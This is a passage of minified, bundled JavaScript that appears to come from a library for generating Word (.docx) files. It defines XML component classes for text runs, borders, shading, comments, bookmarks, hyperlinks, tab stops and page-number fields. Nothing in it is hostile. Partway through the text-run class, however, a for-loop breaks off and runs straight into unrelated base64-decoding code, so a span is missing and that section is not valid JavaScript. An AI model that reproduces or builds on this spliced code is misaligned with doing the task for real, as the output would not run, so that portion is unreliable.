strict";ae.r(I),ae.d(I,{AbstractNumbering:()=>md,Alignment:()=>X,AlignmentAttributes:()=>G,AlignmentType:()=>O,Attributes:()=>_,BaseEmphasisMark:()=>rt,BaseXmlComponent:()=>$,Body:()=>Hs,Bookmark:()=>i_,BookmarkEnd:()=>r0,BookmarkStart:()=>yi,Border:()=>R,BorderElement:()=>L,BorderStyle:()=>B,Column:()=>tr,ColumnAttributes:()=>Oc,ColumnBreak:()=>ec,Columns:()=>Bm,ColumnsAttributes:()=>ds,Comment:()=>Bs,CommentRangeEnd:()=>Vm,CommentRangeStart:()=>Da,CommentReference:()=>vf,Comments:()=>Jp,ConcreteHyperlink:()=>qd,ConcreteNumbering:()=>ih,DeletedTextRun:()=>P_,DocGridAttributes:()=>Wl,Document:()=>S_,DocumentAttributes:()=>ko,DocumentBackground:()=>rd,DocumentBackgroundAttributes:()=>Gd,DocumentDefaults:()=>Wf,DocumentGrid:()=>xs,DocumentGridType:()=>Ho,DotEmphasisMark:()=>Qe,Drawing:()=>Ci,DropCapType:()=>Nc,EMPTY_OBJECT:()=>U,EmphasisMark:()=>Ge,EmphasisMarkType:()=>ve,ExternalHyperlink:()=>Wt,File:()=>S_,FootNoteReferenceRunAttributes:()=>CC,FootNotes:()=>Zu,Footer:()=>VM,FooterWrapper:()=>hl,FootnoteReference:()=>Er,FootnoteReferenceRun:()=>k_,FrameAnchorType:()=>n_,FrameProperties:()=>Gu,FramePropertiesAttributes:()=>Is,FrameWrap:()=>us,GridSpan:()=>u_,Header:()=>im,HeaderFooterReference:()=>zl,HeaderFooterReferenceType:()=>Pt,HeaderFooterType:()=>Xt,HeaderWrapper:()=>pl,HeadingLevel:()=>Qn,HeightRule:()=>Yu,HorizontalPosition:()=>Vn,HorizontalPositionAlign:()=>hd,HorizontalPositionRelativeFrom:()=>pa,HpsMeasureElement:()=>f,HyperlinkType:()=>ii,IgnoreIfEmptyXmlComponent:()=>C,ImageRun:()=>Hu,ImportDotx:()=>bC,ImportedRootElementAttributes:()=>w,ImportedXmlComponent:()=>D,Indent:()=>ue,InitializableXmlComponent:()=>S,InsertedTextRun:()=>oh,InternalHyperlink:()=>H2,LeaderType:()=>Zt,Level:()=>A_,LevelBase:()=>th,LevelForOverride:()=>jm,LevelFormat:()=>ks,LevelOverride:()=>hC,LevelSuffix:()=>Xd,LineNumberAttributes:()=>qu,LineNumberRestartFormat:()=>Qt,LineNumberType:()=>ws,LineRuleType:()=>qt,Math:()=>gr,MathAccentCharacter:()=>l0,MathAngledBrackets:()=>$d,MathBase:()=>hc,MathCurlyBrackets:()=>zM,MathDegree:()=>f0,MathDenominator:()=>c0,MathFraction:()=>OM,MathFunction:()=>fc,MathFunctionName:()=>If,MathFunctionProperties:()=>Qu,MathLimitLocation:()=>d0,MathNAryProperties:()=>Tf,MathNumerator:()=>ju,MathPreSubSuperScript:()=>sa,MathPreSubSuperScriptProperties:()=>u0,MathRadical:()=>X2,MathRadicalProperties:()=>r_,MathRoundBrackets:()=>Ar,MathRun:()=>PM,MathSquareBrackets:()=>J2,MathSubScript:()=>LM,MathSubScriptElement:()=>Ef,MathSubScriptProperties:()=>$2,MathSubSuperScript:()=>Qd,MathSubSuperScriptProperties:()=>K2,MathSum:()=>m0,MathSuperScript:()=>xf,MathSuperScriptElement:()=>Df,MathSuperScriptProperties:()=>o_,Media:()=>dd,NumberFormat:()=>O_,NumberProperties:()=>Xn,NumberValueElement:()=>M,Numbering:()=>I0,OnOffElement:()=>l,OutlineLevel:()=>Uu,OverlapType:()=>be,Packer:()=>L_,PageBorderDisplay:()=>ei,PageBorderOffsetFrom:()=>$o,PageBorderZOrder:()=>ai,PageBorders:()=>a_,PageBreak:()=>Pc,PageBreakBefore:()=>V2,PageMargin:()=>Vi,PageMarginAttributes:()=>xo,PageNumber:()=>ye,PageNumberSeparator:()=>$t,PageNumberType:()=>wo,PageNumberTypeAttributes:()=>Ia,PageOrientation:()=>zo,PageReference:()=>Fr,PageSize:()=>Fl,PageSizeAttributes:()=>_n,PageTextDirection:()=>Vl,PageTextDirectionType:()=>Ut,Paragraph:()=>uc,ParagraphProperties:()=>dl,ParagraphPropertiesDefaults:()=>em,PrettifyType:()=>ch,RelativeHorizontalPosition:()=>Kd,RelativeVerticalPosition:()=>_c,Run:()=>pt,RunFonts:()=>We,RunProperties:()=>$e,RunPropertiesChange:()=>st,RunPropertiesDefaults:()=>R_,SectionProperties:()=>ms,SectionType:()=>Yt,SectionTypeAttributes:()=>er,SequentialIdentifier:()=>a0,Shading:()=>me,ShadingType:()=>se,SimpleField:()=>Xp,SimpleMailMergeField:()=>Ll,SimplePos:()=>Va,SpaceType:()=>ee,Spacing:()=>dc,StringContainer:()=>P,StringValueElement:()=>v,Style:()=>vo,StyleForCharacter:()=>ud,StyleForParagraph:()=>Zd,StyleLevel:()=>gC,Styles:()=>Hl,SymbolRun:()=>zt,TDirection:()=>Sf,Tab:()=>W2,TabAttributes:()=>B2,TabStop:()=>Zp,TabStopItem:()=>Ud,TabStopPosition:()=>Bo,TabStopType:()=>Kt,Table:()=>C0,TableAnchorType:()=>kf,TableBorders:()=>Rn,TableCell:()=>f_,TableCellBorders:()=>sd,TableFloatOptionsAttributes:()=>_0,TableFloatProperties:()=>aC,TableLayout:()=>fs,TableLayoutType:()=>Xu,TableOfContents:()=>FM,TableOverlap:()=>or,TableProperties:()=>ml,TableRow:()=>b0,TableRowHeight:()=>ul,TableRowHeightAttributes:()=>cd,TableRowProperties:()=>y0,TableWidthElement:()=>Rs,TextDirection:()=>Um,TextRun:()=>vt,TextWrappingSide:()=>Co,TextWrappingType:()=>Gt,ThematicBreak:()=>J,Type:()=>Bl,Underline:()=>Le,UnderlineType:()=>le,VerticalAlign:()=>pn,VerticalAlignAttributes:()=>Un,VerticalAlignElement:()=>ur,VerticalMerge:()=>h_,VerticalMergeType:()=>$u,VerticalPosition:()=>Pn,VerticalPositionAlign:()=>Zm,VerticalPositionRelativeFrom:()=>Jt,WORKAROUND:()=>ni,WORKAROUND2:()=>eh,WORKAROUND3:()=>x,WORKAROUND4:()=>h0,WidthType:()=>Lc,WrapNone:()=>cs,WrapSquare:()=>nd,WrapTight:()=>ll,WrapTopAndBottom:()=>Bu,XmlAttributeComponent:()=>b,XmlComponent:()=>E,convertInchesToTwip:()=>ir.convertInchesToTwip,convertMillimetersToTwip:()=>ir.convertMillimetersToTwip,convertToXmlComponent:()=>A,dateTimeValue:()=>ir.dateTimeValue,decimalNumber:()=>ir.decimalNumber,eighthPointMeasureValue:()=>ir.eighthPointMeasureValue,hexColorValue:()=>ir.hexColorValue,hpsMeasureValue:()=>ir.hpsMeasureValue,longHexNumber:()=>ir.longHexNumber,measurementOrPercentValue:()=>ir.measurementOrPercentValue,percentageValue:()=>ir.percentageValue,pointMeasureValue:()=>ir.pointMeasureValue,positiveUniversalMeasureValue:()=>ir.positiveUniversalMeasureValue,sectionMarginDefaults:()=>tc,sectionPageSizeDefaults:()=>$a,shortHexNumber:()=>ir.shortHexNumber,signedHpsMeasureValue:()=>ir.signedHpsMeasureValue,signedTwipsMeasureValue:()=>ir.signedTwipsMeasureValue,twipsMeasureValue:()=>ir.twipsMeasureValue,uCharHexNumber:()=>ir.uCharHexNumber,uniqueId:()=>ir.uniqueId,uniqueNumericId:()=>ir.uniqueNumericId,universalMeasureValue:()=>ir.universalMeasureValue,unsignedDecimalNumber:()=>ir.unsignedDecimalNumber});class ${constructor(Ce){this.rootKey=Ce}}const U=Object.seal({});class E extends ${constructor(Ce){super(Ce),this.root=new Array}prepForXml(Ce){var nt;const Dt=this.root.map(di=>di instanceof $?di.prepForXml(Ce):di).filter(di=>void 0!==di);return{[this.rootKey]:Dt.length?1===Dt.length&&(null===(nt=Dt[0])||void 0===nt?void 0:nt._attr)?Dt[0]:Dt:U}}addChildElement(Ce){return this.root.push(Ce),this}}class C extends E{prepForXml(Ce){const nt=super.prepForXml(Ce);if(nt&&("object"!=typeof nt[this.rootKey]||Object.keys(nt[this.rootKey]).length))return nt}}class b extends ${constructor(Ce){super("_attr"),this.root=Ce}prepForXml(Ce){const nt={};return Object.keys(this.root).forEach(Dt=>{const di=this.root[Dt];void 0!==di&&(nt[this.xmlKeys&&this.xmlKeys[Dt]||Dt]=di)}),{_attr:nt}}}class _ extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",color:"w:color",fill:"w:fill",space:"w:space",sz:"w:sz",type:"w:type",rsidR:"w:rsidR",rsidRPr:"w:rsidRPr",rsidSect:"w:rsidSect",w:"w:w",h:"w:h",top:"w:top",right:"w:right",bottom:"w:bottom",left:"w:left",header:"w:header",footer:"w:footer",gutter:"w:gutter",linePitch:"w:linePitch",pos:"w:pos"}}}var y=ae(7888);const A=Se=>{switch(Se.type){case void 0:case"element":const Ce=new D(Se.name,Se.attributes),nt=Se.elements||[];for(const Dt of nt){const di=A(Dt);void 0!==di&&Ce.push(di)}return Ce;case"text":return Se.text;default:return}};class p extends b{}class D extends E{static fromXmlString(Ce){const nt=(0,y.xml2js)(Ce,{compact:!1});return A(nt)}constructor(Ce,nt){super(Ce),nt&&this.root.push(new p(nt))}push(Ce){this.root.push(Ce)}}class w extends E{constructor(Ce){super(""),this._attr=Ce}prepForXml(Ce){return{_attr:this._attr}}}const x="";class S extends E{constructor(Ce,nt){super(Ce),nt&&(this.root=nt.root)}}var O,B,K,ee,se,ve,le,ye,Se,z=ae(6595);class l extends E{constructor(Ce,nt=!0){super(Ce),!0!==nt&&this.root.push(new _({val:nt}))}}class f extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:(0,z.KR)(nt)}))}}class v extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class M extends E{constructor(Ce,nt){super(Ce),this.root.push(new _({val:nt}))}}class P extends E{constructor(Ce,nt){super(Ce),this.root.push(nt)}}(Se=O||(O={})).START="start",Se.END="end",Se.CENTER="center",Se.BOTH="both",Se.JUSTIFIED="both",Se.DISTRIBUTE="distribute",Se.LEFT="left",Se.RIGHT="right";class G extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val"}}}class X extends E{constructor(Ce){super("w:jc"),this.root.push(new G({val:Ce}))}}class L extends E{constructor(Ce,{color:nt,size:Dt,space:di,style:pi}){super(Ce),this.root.push(new h({style:pi,color:void 0===nt?void 0:(0,z.dg)(nt),size:void 0===Dt?void 0:(0,z.LV)(Dt),space:void 0===di?void 0:(0,z.gg)(di)}))}}class h extends b{constructor(){super(...arguments),this.xmlKeys={style:"w:val",color:"w:color",size:"w:sz",space:"w:space"}}}!function(Se){Se.SINGLE="single",Se.DASH_DOT_STROKED="dashDotStroked",Se.DASHED="dashed",Se.DASH_SMALL_GAP="dashSmallGap",Se.DOT_DASH="dotDash",Se.DOT_DOT_DASH="dotDotDash",Se.DOTTED="dotted",Se.DOUBLE="double",Se.DOUBLE_WAVE="doubleWave",Se.INSET="inset",Se.NIL="nil",Se.NONE="none",Se.OUTSET="outset",Se.THICK="thick",Se.THICK_THIN_LARGE_GAP="thickThinLargeGap",Se.THICK_THIN_MEDIUM_GAP="thickThinMediumGap",Se.THICK_THIN_SMALL_GAP="thickThinSmallGap",Se.THIN_THICK_LARGE_GAP="thinThickLargeGap",Se.THIN_THICK_MEDIUM_GAP="thinThickMediumGap",Se.THIN_THICK_SMALL_GAP="thinThickSmallGap",Se.THIN_THICK_THIN_LARGE_GAP="thinThickThinLargeGap",Se.THIN_THICK_THIN_MEDIUM_GAP="thinThickThinMediumGap",Se.THIN_THICK_THIN_SMALL_GAP="thinThickThinSmallGap",Se.THREE_D_EMBOSS="threeDEmboss",Se.THREE_D_ENGRAVE="threeDEngrave",Se.TRIPLE="triple",Se.WAVE="wave"}(B||(B={}));class R extends C{constructor(Ce){super("w:pBdr"),Ce.top&&this.root.push(new L("w:top",Ce.top)),Ce.bottom&&this.root.push(new L("w:bottom",Ce.bottom)),Ce.left&&this.root.push(new L("w:left",Ce.left)),Ce.right&&this.root.push(new L("w:right",Ce.right))}}class J extends E{constructor(){super("w:pBdr");const Ce=new L("w:bottom",{color:"auto",space:1,style:B.SINGLE,size:6});this.root.push(Ce)}}class Z extends b{constructor(){super(...arguments),this.xmlKeys={start:"w:start",end:"w:end",left:"w:left",right:"w:right",hanging:"w:hanging",firstLine:"w:firstLine"}}}class ue extends E{constructor({start:Ce,end:nt,left:Dt,right:di,hanging:pi,firstLine:Hi}){super("w:ind"),this.root.push(new Z({start:void 0===Ce?void 0:(0,z.xb)(Ce),end:void 0===nt?void 0:(0,z.xb)(nt),left:void 0===Dt?void 0:(0,z.xb)(Dt),right:void 0===di?void 0:(0,z.xb)(di),hanging:void 0===pi?void 0:(0,z.Jd)(pi),firstLine:void 0===Hi?void 0:(0,z.Jd)(Hi)}))}}class Ie extends E{constructor(){super("w:br")}}!function(Se){Se.BEGIN="begin",Se.END="end",Se.SEPARATE="separate"}(K||(K={}));class Ae extends b{constructor(){super(...arguments),this.xmlKeys={type:"w:fldCharType",dirty:"w:dirty"}}}class Ue extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.BEGIN,dirty:Ce}))}}class Xe extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.SEPARATE,dirty:Ce}))}}class He extends E{constructor(Ce){super("w:fldChar"),this.root.push(new Ae({type:K.END,dirty:Ce}))}}!function(Se){Se.DEFAULT="default",Se.PRESERVE="preserve"}(ee||(ee={}));class Be extends b{constructor(){super(...arguments),this.xmlKeys={space:"xml:space"}}}class qe extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("PAGE")}}class De extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("NUMPAGES")}}class Ve extends E{constructor(){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push("SECTIONPAGES")}}class ze extends b{constructor(){super(...arguments),this.xmlKeys={fill:"w:fill",color:"w:color",type:"w:val"}}}class me extends E{constructor({fill:Ce,color:nt,type:Dt}){super("w:shd"),this.root.push(new ze({fill:void 0===Ce?void 0:(0,z.dg)(Ce),color:void 0===nt?void 0:(0,z.dg)(nt),type:Dt}))}}!function(Se){Se.CLEAR="clear",Se.DIAGONAL_CROSS="diagCross",Se.DIAGONAL_STRIPE="diagStripe",Se.HORIZONTAL_CROSS="horzCross",Se.HORIZONTAL_STRIPE="horzStripe",Se.NIL="nil",Se.PERCENT_5="pct5",Se.PERCENT_10="pct10",Se.PERCENT_12="pct12",Se.PERCENT_15="pct15",Se.PERCENT_20="pct20",Se.PERCENT_25="pct25",Se.PERCENT_30="pct30",Se.PERCENT_35="pct35",Se.PERCENT_37="pct37",Se.PERCENT_40="pct40",Se.PERCENT_45="pct45",Se.PERCENT_50="pct50",Se.PERCENT_55="pct55",Se.PERCENT_60="pct60",Se.PERCENT_62="pct62",Se.PERCENT_65="pct65",Se.PERCENT_70="pct70",Se.PERCENT_75="pct75",Se.PERCENT_80="pct80",Se.PERCENT_85="pct85",Se.PERCENT_87="pct87",Se.PERCENT_90="pct90",Se.PERCENT_95="pct95",Se.REVERSE_DIAGONAL_STRIPE="reverseDiagStripe",Se.SOLID="solid",Se.THIN_DIAGONAL_CROSS="thinDiagCross",Se.THIN_DIAGONAL_STRIPE="thinDiagStripe",Se.THIN_HORIZONTAL_CROSS="thinHorzCross",Se.THIN_REVERSE_DIAGONAL_STRIPE="thinReverseDiagStripe",Se.THIN_VERTICAL_STRIPE="thinVertStripe",Se.VERTICAL_STRIPE="vertStripe"}(se||(se={}));class Ke extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",author:"w:author",date:"w:date"}}}!function(Se){Se.DOT="dot"}(ve||(ve={}));class rt extends E{constructor(Ce){super("w:em"),this.root.push(new _({val:Ce}))}}class Ge extends rt{constructor(Ce=ve.DOT){super(Ce)}}class Qe extends rt{constructor(){super(ve.DOT)}}class ht extends E{constructor(Ce){super("w:spacing"),this.root.push(new _({val:(0,z.xb)(Ce)}))}}class mt extends E{constructor(Ce){super("w:color"),this.root.push(new _({val:(0,z.dg)(Ce)}))}}class lt extends E{constructor(Ce){super("w:highlight"),this.root.push(new _({val:Ce}))}}class ft extends E{constructor(Ce){super("w:highlightCs"),this.root.push(new _({val:Ce}))}}class xe extends b{constructor(){super(...arguments),this.xmlKeys={ascii:"w:ascii",cs:"w:cs",eastAsia:"w:eastAsia",hAnsi:"w:hAnsi",hint:"w:hint"}}}class We extends E{constructor(Ce,nt){super("w:rFonts"),this.root.push(new xe("string"==typeof Ce?{ascii:Ce,cs:Ce,eastAsia:Ce,hAnsi:Ce,hint:nt}:Ce))}}class Je extends E{constructor(Ce){super("w:vertAlign"),this.root.push(new _({val:Ce}))}}class Oe extends Je{constructor(){super("superscript")}}class Te extends Je{constructor(){super("subscript")}}!function(Se){Se.SINGLE="single",Se.WORDS="words",Se.DOUBLE="double",Se.THICK="thick",Se.DOTTED="dotted",Se.DOTTEDHEAVY="dottedHeavy",Se.DASH="dash",Se.DASHEDHEAVY="dashedHeavy",Se.DASHLONG="dashLong",Se.DASHLONGHEAVY="dashLongHeavy",Se.DOTDASH="dotDash",Se.DASHDOTHEAVY="dashDotHeavy",Se.DOTDOTDASH="dotDotDash",Se.DASHDOTDOTHEAVY="dashDotDotHeavy",Se.WAVE="wave",Se.WAVYHEAVY="wavyHeavy",Se.WAVYDOUBLE="wavyDouble"}(le||(le={}));class Le extends E{constructor(Ce=le.SINGLE,nt){super("w:u"),this.root.push(new _({val:Ce,color:void 0===nt?void 0:(0,z.dg)(nt)}))}}class $e extends C{constructor(Ce){var nt,Dt;if(super("w:rPr"),!Ce)return;void 0!==Ce.bold&&this.push(new l("w:b",Ce.bold)),(void 0===Ce.boldComplexScript&&void 0!==Ce.bold||Ce.boldComplexScript)&&this.push(new l("w:bCs",null!==(nt=Ce.boldComplexScript)&&void 0!==nt?nt:Ce.bold)),void 0!==Ce.italics&&this.push(new l("w:i",Ce.italics)),(void 0===Ce.italicsComplexScript&&void 0!==Ce.italics||Ce.italicsComplexScript)&&this.push(new l("w:iCs",null!==(Dt=Ce.italicsComplexScript)&&void 0!==Dt?Dt:Ce.italics)),Ce.underline&&this.push(new Le(Ce.underline.type,Ce.underline.color)),Ce.emphasisMark&&this.push(new Ge(Ce.emphasisMark.type)),Ce.color&&this.push(new mt(Ce.color)),void 0!==Ce.size&&this.push(new f("w:sz",Ce.size));const di=void 0===Ce.sizeComplexScript||!0===Ce.sizeComplexScript?Ce.size:Ce.sizeComplexScript;di&&this.push(new f("w:szCs",di)),void 0!==Ce.rightToLeft&&this.push(new l("w:rtl",Ce.rightToLeft)),void 0!==Ce.smallCaps?this.push(new l("w:smallCaps",Ce.smallCaps)):void 0!==Ce.allCaps&&this.push(new l("w:caps",Ce.allCaps)),void 0!==Ce.strike&&this.push(new l("w:strike",Ce.strike)),void 0!==Ce.doubleStrike&&this.push(new l("w:dstrike",Ce.doubleStrike)),Ce.subScript&&this.push(new Te),Ce.superScript&&this.push(new Oe),Ce.style&&this.push(new v("w:rStyle",Ce.style)),Ce.font&&this.push("string"==typeof Ce.font?new We(Ce.font):"name"in Ce.font?new We(Ce.font.name,Ce.font.hint):new We(Ce.font)),Ce.highlight&&this.push(new lt(Ce.highlight));const pi=void 0===Ce.highlightComplexScript||!0===Ce.highlightComplexScript?Ce.highlight:Ce.highlightComplexScript;pi&&this.push(new ft(pi)),Ce.characterSpacing&&this.push(new ht(Ce.characterSpacing)),void 0!==Ce.emboss&&this.push(new l("w:emboss",Ce.emboss)),void 0!==Ce.imprint&&this.push(new l("w:imprint",Ce.imprint)),Ce.shading&&this.push(new me(Ce.shading)),Ce.revision&&this.push(new st(Ce.revision)),Ce.border&&this.push(new L("w:bdr",Ce.border))}push(Ce){this.root.push(Ce)}}class st extends E{constructor(Ce){super("w:rPrChange"),this.root.push(new Ke({id:Ce.id,author:Ce.author,date:Ce.date})),this.addChildElement(new $e(Ce))}}class xt extends E{constructor(Ce){super("w:t"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(Ce)}}!function(Se){Se.CURRENT="CURRENT",Se.TOTAL_PAGES="TOTAL_PAGES",Se.TOTAL_PAGES_IN_SECTION="TOTAL_PAGES_IN_SECTION"}(ye||(ye={}));class pt extends E{constructor(Ce){if(super("w:r"),this.properties=new $e(Ce),this.root.push(this.properties),Ce.break)for(let nt=0;ntdi.charCodeAt(0))):new(ae(8764).Buffer)(Ce,"base64")}}class t0 extends E{constructor(Ce){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE})),this.root.push(`SEQ ${Ce}`)}}class a0 extends pt{constructor(Ce){super({}),this.root.push(new Ue(!0)),this.root.push(new t0(Ce)),this.root.push(new Xe),this.root.push(new He)}}class W2 extends E{constructor(){super("w:tab")}}class ls extends b{constructor(){super(...arguments),this.xmlKeys={instr:"w:instr"}}}class Xp extends E{constructor(Ce,nt){super("w:fldSimple"),this.root.push(new ls({instr:Ce})),void 0!==nt&&this.root.push(new vt(nt))}}class Ll extends Xp{constructor(Ce){super(` MERGEFIELD ${Ce} `,`\xab${Ce}\xbb`)}}class Yp extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",initials:"w:initials",author:"w:author",date:"w:date"}}}class Mf extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class F2 extends b{constructor(){super(...arguments),this.xmlKeys={"xmlns:cx":"xmlns:cx","xmlns:cx1":"xmlns:cx1","xmlns:cx2":"xmlns:cx2","xmlns:cx3":"xmlns:cx3","xmlns:cx4":"xmlns:cx4","xmlns:cx5":"xmlns:cx5","xmlns:cx6":"xmlns:cx6","xmlns:cx7":"xmlns:cx7","xmlns:cx8":"xmlns:cx8","xmlns:mc":"xmlns:mc","xmlns:aink":"xmlns:aink","xmlns:am3d":"xmlns:am3d","xmlns:o":"xmlns:o","xmlns:r":"xmlns:r","xmlns:m":"xmlns:m","xmlns:v":"xmlns:v","xmlns:wp14":"xmlns:wp14","xmlns:wp":"xmlns:wp","xmlns:w10":"xmlns:w10","xmlns:w":"xmlns:w","xmlns:w14":"xmlns:w14","xmlns:w15":"xmlns:w15","xmlns:w16cex":"xmlns:w16cex","xmlns:w16cid":"xmlns:w16cid","xmlns:w16":"xmlns:w16","xmlns:w16sdtdh":"xmlns:w16sdtdh","xmlns:w16se":"xmlns:w16se","xmlns:wpg":"xmlns:wpg","xmlns:wpi":"xmlns:wpi","xmlns:wne":"xmlns:wne","xmlns:wps":"xmlns:wps"}}}class Da extends E{constructor(Ce){super("w:commentRangeStart"),this.root.push(new Mf({id:Ce}))}}class Vm extends E{constructor(Ce){super("w:commentRangeEnd"),this.root.push(new Mf({id:Ce}))}}class vf extends E{constructor(Ce){super("w:commentReference"),this.root.push(new Mf({id:Ce}))}}class Bs extends E{constructor({id:Ce,initials:nt,author:Dt,date:di=new Date,text:pi}){super("w:comment"),this.root.push(new Yp({id:Ce,initials:nt,author:Dt,date:di.toISOString()})),this.root.push(new uc({children:[new vt(pi)]}))}}class Jp extends E{constructor({children:Ce}){super("w:comments"),this.root.push(new F2({"xmlns:cx":"http://schemas.microsoft.com/office/drawing/2014/chartex","xmlns:cx1":"http://schemas.microsoft.com/office/drawing/2015/9/8/chartex","xmlns:cx2":"http://schemas.microsoft.com/office/drawing/2015/10/21/chartex","xmlns:cx3":"http://schemas.microsoft.com/office/drawing/2016/5/9/chartex","xmlns:cx4":"http://schemas.microsoft.com/office/drawing/2016/5/10/chartex","xmlns:cx5":"http://schemas.microsoft.com/office/drawing/2016/5/11/chartex","xmlns:cx6":"http://schemas.microsoft.com/office/drawing/2016/5/12/chartex","xmlns:cx7":"http://schemas.microsoft.com/office/drawing/2016/5/13/chartex","xmlns:cx8":"http://schemas.microsoft.com/office/drawing/2016/5/14/chartex","xmlns:mc":"http://schemas.openxmlformats.org/markup-compatibility/2006","xmlns:aink":"http://schemas.microsoft.com/office/drawing/2016/ink","xmlns:am3d":"http://schemas.microsoft.com/office/drawing/2017/model3d","xmlns:o":"urn:schemas-microsoft-com:office:office","xmlns:r":"http://schemas.openxmlformats.org/officeDocument/2006/relationships","xmlns:m":"http://schemas.openxmlformats.org/officeDocument/2006/math","xmlns:v":"urn:schemas-microsoft-com:vml","xmlns:wp14":"http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing","xmlns:wp":"http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing","xmlns:w10":"urn:schemas-microsoft-com:office:word","xmlns:w":"http://schemas.openxmlformats.org/wordprocessingml/2006/main","xmlns:w14":"http://schemas.microsoft.com/office/word/2010/wordml","xmlns:w15":"http://schemas.microsoft.com/office/word/2012/wordml","xmlns:w16cex":"http://schemas.microsoft.com/office/word/2018/wordml/cex","xmlns:w16cid":"http://schemas.microsoft.com/office/word/2016/wordml/cid","xmlns:w16":"http://schemas.microsoft.com/office/word/2018/wordml","xmlns:w16sdtdh":"http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash","xmlns:w16se":"http://schemas.microsoft.com/office/word/2015/wordml/symex","xmlns:wpg":"http://schemas.microsoft.com/office/word/2010/wordprocessingGroup","xmlns:wpi":"http://schemas.microsoft.com/office/word/2010/wordprocessingInk","xmlns:wne":"http://schemas.microsoft.com/office/word/2006/wordml","xmlns:wps":"http://schemas.microsoft.com/office/word/2010/wordprocessingShape"}));for(const nt of Ce)this.root.push(new Bs(nt))}}!function(Se){Se.COLUMN="column",Se.PAGE="page"}(jt||(jt={}));class od extends E{constructor(Ce){super("w:br"),this.root.push(new _({type:Ce}))}}class Pc extends pt{constructor(){super({}),this.root.push(new od(jt.PAGE))}}class ec extends pt{constructor(){super({}),this.root.push(new od(jt.COLUMN))}}class V2 extends E{constructor(){super("w:pageBreakBefore")}}!function(Se){Se.AT_LEAST="atLeast",Se.EXACTLY="exactly",Se.AUTO="auto"}(qt||(qt={}));class kM extends b{constructor(){super(...arguments),this.xmlKeys={after:"w:after",before:"w:before",line:"w:line",lineRule:"w:lineRule"}}}class dc extends E{constructor(Ce){super("w:spacing"),this.root.push(new kM(Ce))}}!function(Se){Se.HEADING_1="Heading1",Se.HEADING_2="Heading2",Se.HEADING_3="Heading3",Se.HEADING_4="Heading4",Se.HEADING_5="Heading5",Se.HEADING_6="Heading6",Se.TITLE="Title"}(Qn||(Qn={}));class vo extends E{constructor(Ce){super("w:pStyle"),this.root.push(new _({val:Ce}))}}class Zp extends E{constructor(Ce,nt,Dt){super("w:tabs"),this.root.push(new Ud(Ce,nt,Dt))}}(function(Se){Se.LEFT="left",Se.RIGHT="right",Se.CENTER="center",Se.BAR="bar",Se.CLEAR="clear",Se.DECIMAL="decimal",Se.END="end",Se.NUM="num",Se.START="start"})(Kt||(Kt={})),function(Se){Se.DOT="dot",Se.HYPHEN="hyphen",Se.MIDDLE_DOT="middleDot",Se.NONE="none",Se.UNDERSCORE="underscore"}(Zt||(Zt={})),function(Se){Se[Se.MAX=9026]="MAX"}(Bo||(Bo={}));class B2 extends b{constructor(){super(...arguments),this.xmlKeys={val:"w:val",pos:"w:pos",leader:"w:leader"}}}class Ud extends E{constructor(Ce,nt,Dt){super("w:tab"),this.root.push(new B2({val:Ce,pos:nt,leader:Dt}))}}class Xn extends E{constructor(Ce,nt){super("w:numPr"),this.root.push(new Af(nt)),this.root.push(new e_(Ce))}}class Af extends E{constructor(Ce){if(super("w:ilvl"),Ce>9)throw new Error("Level cannot be greater than 9. Read more here: https://answers.microsoft.com/en-us/msoffice/forum/all/does-word-support-more-than-9-list-levels/d130fdcd-1781-446d-8c84-c6c79124e4d7");this.root.push(new _({val:Ce}))}}class e_ extends E{constructor(Ce){super("w:numId"),this.root.push(new _({val:"string"==typeof Ce?`{${Ce}}`:Ce}))}}class t_ extends b{constructor(){super(...arguments),this.xmlKeys={id:"Id",type:"Type",target:"Target",targetMode:"TargetMode"}}}!function(Se){Se.EXTERNAL="External"}(ti||(ti={}));class n0 extends E{constructor(Ce,nt,Dt,di){super("Relationship"),this.root.push(new t_({id:Ce,type:nt,target:Dt,targetMode:di}))}}class mc extends b{constructor(){super(...arguments),this.xmlKeys={id:"r:id",history:"w:history",anchor:"w:anchor"}}}!function(Se){Se.INTERNAL="INTERNAL",Se.EXTERNAL="EXTERNAL"}(ii||(ii={}));class qd extends E{constructor(Ce,nt,Dt){super("w:hyperlink"),this.linkId=nt;const pi=new mc({history:1,anchor:Dt||void 0,id:Dt?void 0:`rId${this.linkId}`});this.root.push(pi),Ce.forEach(Hi=>{this.root.push(Hi)})}}class H2 extends qd{constructor(Ce){super(Ce.children,(0,ha.EL)(),Ce.anchor)}}class Wt extends E{constructor(Ce){super("w:externalHyperlink"),this.options=Ce}}class Ds extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id",name:"w:name"}}}class o0 extends b{constructor(){super(...arguments),this.xmlKeys={id:"w:id"}}}class i_{constructor(Ce){const nt=(0,ha.NY)();this.start=new yi(Ce.id,nt),this.children=Ce.children,this.end=new r0(nt)}}class yi extends E{constructor(Ce,nt){super("w:bookmarkStart");const Dt=new Ds({name:Ce,id:nt});this.root.push(Dt)}}class r0 extends E{constructor(Ce){super("w:bookmarkEnd");const nt=new o0({id:Ce});this.root.push(nt)}}class Uu extends E{constructor(Ce){super("w:outlineLvl"),this.level=Ce,this.root.push(new _({val:Ce}))}}class Ot extends E{constructor(Ce,nt={}){super("w:instrText"),this.root.push(new Be({space:ee.PRESERVE}));let Dt=`PAGEREF ${Ce}`;nt.hyperlink&&(Dt=`${Dt} \\h`),nt.useRelativePosition&&(Dt=`${Dt} \\p`),this.root.push(Dt)}}class Fr extends pt{constructor(Ce,nt={}){super({children:[new Ue(!0),new Ot(Ce,nt),new 